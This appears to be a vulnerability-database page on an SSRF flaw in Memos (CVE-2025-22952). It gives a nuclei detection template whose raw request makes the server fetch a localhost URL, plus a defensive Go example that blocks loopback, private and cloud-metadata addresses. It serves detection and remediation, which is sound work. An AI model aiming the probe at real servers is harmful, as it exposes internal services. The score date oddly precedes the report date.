Elestio Memos <= v0.24.0 - Server-Side Request Forgery

Reported: 03 Jul 2026 03:01:05 by ProjectDiscovery | Type: nuclei | Source: github.com | 27 Views

Elestio Memos v0.23.0 has a critical SSRF vulnerability due to insufficient URL validation.

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| Circl | CVE-2025-22952 | 27 Feb 2025 21:59 | circl |
| CNNVD | Memos security vulnerability | 27 Feb 2025 00:00 | cnnvd |
| CVE | CVE-2025-22952 | 27 Feb 2025 00:00 | cve |
| Cvelist | CVE-2025-22952 | 27 Feb 2025 00:00 | cvelist |
| Github Security Blog | Memos Server-Side Request Forgery (SSRF) | 27 Feb 2025 21:32 | github |
| NVD | CVE-2025-22952 | 27 Feb 2025 20:16 | nvd |
| OSV | GHSA-WFXG-V3J4-7QMJ Memos Server-Side Request Forgery (SSRF) | 27 Feb 2025 21:32 | osv |
| OSV | GO-2025-3492 Memos Server-Side Request Forgery (SSRF) in github.com/usememos/memos | 3 Mar 2025 19:22 | osv |
| OSV | OPENSUSE-SU-2025:14889-1 govulncheck-vulndb-0.0.20250312T181707-1.1 on GA media | 13 Mar 2025 00:00 | osv |
| Positive Technologies | PT-2025-6100 | 10 Feb 2025 00:00 | ptsecurity |
id: CVE-2025-22952

info:
  name: Elestio Memos <= v0.24.0 - Server-Side Request Forgery
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Elestio Memos v0.23.0 is vulnerable to Server-Side Request Forgery (SSRF) because it does not sufficiently validate user-supplied URLs before fetching them, so the server can be made to issue requests to attacker-chosen destinations.
  impact: |
    Unauthenticated attackers can exploit SSRF vulnerabilities to access internal services, bypass network security controls, and potentially retrieve sensitive information from internal systems.
  remediation: |
    Upgrade to Memos version 0.24.1 or later that properly validates and restricts URL access.
  reference:
    - https://github.com/advisories/GHSA-wfxg-v3j4-7qmj
    - https://elest.io/open-source/memos
    - https://github.com/usememos/memos
    - https://github.com/usememos/memos/issues/4413
    - https://github.com/usememos/memos/pull/4428
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-22952
    cwe-id: CWE-918
    epss-score: 0.02818
    epss-percentile: 0.8483
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.favicon.hash:-1924700661
  tags: cve,cve2025,elestio,memos,ssrf,oast,vuln,vkev

http:
  - raw:
      - |
        GET /api/v1/markdown/link:metadata?link=http://localhost:13042 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'localhost:13042'
          - 'connect: connection refused'
        condition: and

      - type: word
        part: content_type
        words:
          - 'application/json'

      - type: status
        status:
          - 500
# digest: 4a0a0047304502210091104d57b41ee7926c1f48502c49dfda1795d17c19b917c6679a5b14c940268802202878d1a3c6feb5a0d3f274b1e7ed46c8ab3d2441ff1f3573a6046e6f1bb4014a:922c64590222798bb761d5b6d8e72950
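The template above detects the flaw by asking the link-metadata endpoint to fetch a loopback URL and matching the "connection refused" error that leaks back in the JSON body. The defensive counterpart is a URL check that refuses non-public targets both before the request and at connect time. The following Go program is an added example written for this page; it is not the Memos project's code and does not reproduce the fix in pull request 4428. The function names `ValidateLink`, `isBlockedIP`, `safeControl` and `NewSafeClient` are hypothetical, and the sample links in `main` are constructed.

```go
package main

import (
	"errors"
	"fmt"
	"net"
	"net/http"
	"net/url"
	"strings"
	"syscall"
	"time"
)

// ErrBlockedTarget is returned when a link points at an address the server
// must never fetch on a user's behalf (loopback, private, link-local, ...).
var ErrBlockedTarget = errors.New("link target is not a public address")

// isBlockedIP reports whether ip falls in a range an SSRF check must reject:
// unspecified (0.0.0.0 / ::), loopback, RFC 1918 and ULA private space,
// link-local (which covers the 169.254.169.254 cloud metadata address) and
// multicast.
func isBlockedIP(ip net.IP) bool {
	return ip.IsUnspecified() || ip.IsLoopback() || ip.IsPrivate() ||
		ip.IsLinkLocalUnicast() || ip.IsLinkLocalMulticast() || ip.IsMulticast()
}

// ValidateLink is the cheap pre-request check on a user-supplied link: only
// http/https, a host must be present, "localhost" names are rejected and
// literal IP addresses are screened with isBlockedIP. It deliberately does no
// DNS lookup, so a hostname that resolves to an internal address still passes
// here; that case is caught at connect time by safeControl.
func ValidateLink(raw string) (*url.URL, error) {
	u, err := url.Parse(raw)
	if err != nil {
		return nil, err
	}
	if u.Scheme != "http" && u.Scheme != "https" {
		return nil, fmt.Errorf("scheme %q not allowed", u.Scheme)
	}
	host := strings.ToLower(u.Hostname()) // Hostname() strips port and IPv6 brackets
	if host == "" {
		return nil, errors.New("missing host")
	}
	if host == "localhost" || strings.HasSuffix(host, ".localhost") {
		return nil, ErrBlockedTarget
	}
	if ip := net.ParseIP(host); ip != nil && isBlockedIP(ip) {
		return nil, ErrBlockedTarget
	}
	return u, nil
}

// safeControl runs after DNS resolution and just before the socket connects,
// so it sees the actual IP being dialed. Rejecting here defeats hostnames
// that resolve to internal addresses and DNS-rebinding tricks that a
// parse-time check alone cannot see.
func safeControl(network, address string, _ syscall.RawConn) error {
	host, _, err := net.SplitHostPort(address)
	if err != nil {
		return err
	}
	ip := net.ParseIP(host)
	if ip == nil || isBlockedIP(ip) {
		return ErrBlockedTarget
	}
	return nil
}

// NewSafeClient builds an http.Client whose every connection, including those
// made after a redirect, passes through safeControl. Redirect targets are
// re-validated and capped so a public URL cannot bounce the server inward.
func NewSafeClient() *http.Client {
	dialer := &net.Dialer{Timeout: 5 * time.Second, Control: safeControl}
	return &http.Client{
		Timeout:   10 * time.Second,
		Transport: &http.Transport{DialContext: dialer.DialContext},
		CheckRedirect: func(req *http.Request, via []*http.Request) error {
			if len(via) >= 3 {
				return errors.New("too many redirects")
			}
			_, err := ValidateLink(req.URL.String())
			return err
		},
	}
}

func main() {
	// Constructed inputs: the loopback link used by the nuclei probe above,
	// two other internal targets and an ordinary public link.
	links := []string{
		"http://localhost:13042",
		"http://127.0.0.1:5230/",
		"http://169.254.169.254/latest/",
		"https://example.com/page",
	}
	for _, link := range links {
		_, err := ValidateLink(link)
		fmt.Printf("%-35s -> %v\n", link, err)
	}
}
```

The two layers matter together: `ValidateLink` gives a fast, testable rejection for obvious cases, while the `Dialer.Control` hook is what actually enforces the policy on the address the socket connects to, which is the only place a hostname-based bypass can be stopped.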

Scores (as of 04 Feb 2026 07:00, current):
Vulners AI Score: 6.1 (Medium risk)
CVSS 3.1: 9.8
EPSS: 0.02818
SSVC: not shown
Views: 27